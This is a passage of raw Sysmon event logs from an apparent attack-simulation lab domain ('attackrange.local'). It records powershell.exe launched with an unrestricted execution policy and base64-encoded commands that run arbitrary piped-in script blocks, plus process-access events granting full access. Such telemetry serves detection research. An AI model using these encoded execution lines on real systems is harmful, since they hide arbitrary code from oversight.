-NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","ProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-001080C20900}","ParentProcessId":"4456","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nSourceProcessId: 4456\r\nSourceThreadId: 4604\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","SourceProcessId":"4456","SourceThreadId":"4604","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 